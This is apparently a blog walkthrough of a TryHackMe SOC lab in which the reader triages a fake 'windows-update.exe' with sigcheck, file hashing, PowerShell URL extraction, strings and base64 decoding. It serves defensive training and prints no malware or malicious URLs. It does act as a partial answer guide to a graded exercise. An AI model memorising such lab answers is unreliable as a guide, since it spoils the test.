Skip to main content
HashnodeCyberWithSharon

Command Palette

Search for a command to run...

Shadow Trace

Updated
4 min read
Shadow Trace
J
Jebitok

Software Developer | Learning Cybersecurity | Open for roles *

If you're in the early stages of your career in software development (student or still looking for an entry-level role) and in need of mentorship, you can reach out to me.

It’s the graveyard shift, and you’re the lone analyst in the SOC when an urgent call comes in: a user’s machine dropped a suspicious binary named windows-update.exe. At first glance, it masquerades as a routine updater, but alerts from the EDR and oddities in the file contents suggest something far more sinister. This exercise places you in that real-world pressure cooker: triage fast, collect reliable indicators, and decide whether to escalate or contain.

Throughout this lab, you’ll practice core SOC triage workflows—static binary inspection, IOC extraction, and alert correlation—while answering targeted questions that mirror daily incident-response tasks. By the end, you’ll be able to identify network IOCs, compute and record file hashes, read process-level triggers, and translate encoded artifacts into actionable intelligence. Think of it as hands-on experience for the moment when speed, precision, and context matter most.

Scenario

It’s the middle of the night shift. You’re the only analyst in the SOC when a manager calls in urgently: a suspicious file was found on a user's machine and needs immediate review.

You open the file and start digging. Something doesn’t look normal for a company updater, and at the same time, the EDR throws a couple of alerts.

Your task: analyse the file, collect anything to identify it, gather any potential IOCs, correlate and analyse the alerts for potential malicious behaviour. It’s up to you to piece together what’s happening before it spreads further.

Learning Objectives

  • Extract IOCs from suspicious binaries

  • Correlate alerts with malicious activity

  • Perform basic SOC triage actions

Prerequisites

Follow the instructions for the next tasks to start.

File analysis

Analyse the binary located C:\Users\DFIRUser\Desktop\windows-update.exe in the attached machine, answer the questions below.

Start the lab by clicking the Start Machine button. It will take around 2 minutes to load properly. The VM will be accessible on the right side of the split screen.

You can find several tools installed in the machine that can help you with any kind of analysis under C:\Users\DFIRUser\DFIR Tools

Answer the questions below

  1. What is the architecture of the binary file windows-update.exe?

    sigcheck.exe C:\Users\DFIRUser\Desktop\windows-update.exe

  1. What is the hash (sha-256) of the file windows-update.exe?

    Get-FileHash -Algorithm SHA256 "C:\Users\DFIRUser\Desktop\windows-update.exe"

  2. Identify the URL within the file to use it as an IOC

     $bytes = Get-Content -Path "C:\Users\DFIRUser\Desktop\windows-update.exe" -Encoding Byte
 $text  = [System.Text.Encoding]::ASCII.GetString($bytes)
 [regex]::Matches($text, 'https?://[^\s"''<>\\]+') | ForEach-Object { $_.Value } | Sort-Object -Unique

  3. With the URL identified, can you spot a domain that can be used as an IOC?

    strings "C:\Users\DFIRUser\Desktop\windows-update.exe" | findstr /i ".com"

  4. Input the decoded flag from the suspicious domain

    decode the base64 code

  5. What library related to socket communication is loaded by the binary?

    searched the hash found above on Virustotal and found the decoded flag under the imports

Alerts Analysis

Click on the View Site button attached to this task to display the static site in split view. Review the alternatives and answer the questions below.

Alternatively, if you can not see all the columns in split view, you can open the static site in full screen by clicking the link below:

THM Key Credentials

ACCESS

Interactive Exercise

Answer the questions below

For this section, data encoding and cryptography will be of help to know which encoding or decoding is used, and an easy way to decode it to plain text in order to find the expected answer. Personally, I used Cyberchef and Base64 sites to decode them.

  1. Can you identify the malicious URL from the trigger by the process powershell.exe?

  2. Can you identify the malicious URL from the alert triggered by chrome.exe?

  1. What's the name of the file saved in the alert triggered by chrome.exe?

    The answer is just there on the command for chrome.exe

This exercise reinforces the essentials of early-stage incident response: verify file provenance, extract trustworthy indicators from binaries, and correlate telemetry from endpoints and network sensors to form a coherent hypothesis. A malicious-looking updater can quickly turn into a lateral propagation or data-exfiltration incident if missed—so collecting SHA-256 hashes, embedded URLs, imported libraries (like Winsock), and related process activity isn’t optional, it’s critical.

Beyond the technical checks, the most valuable outcome is practice: the ability to triage under pressure, prioritize containment (isolate host, block domain/IP, collect artifacts), and document findings for escalation. With the IOCs and alerts from this lab, you’re equipped to drive a defensible response—submit artifacts to intel platforms, update detection rules, and harden controls so the next “fake update” fails to find purchase.

#tryhackme-walkthrough#malware-analysis#windows#dfir#encoder-decoder
12 views

Comments

Join the discussion

No comments yet. Be the first to comment.

More from this blog

C

CyberWithSharon

432 posts

Shadow Trace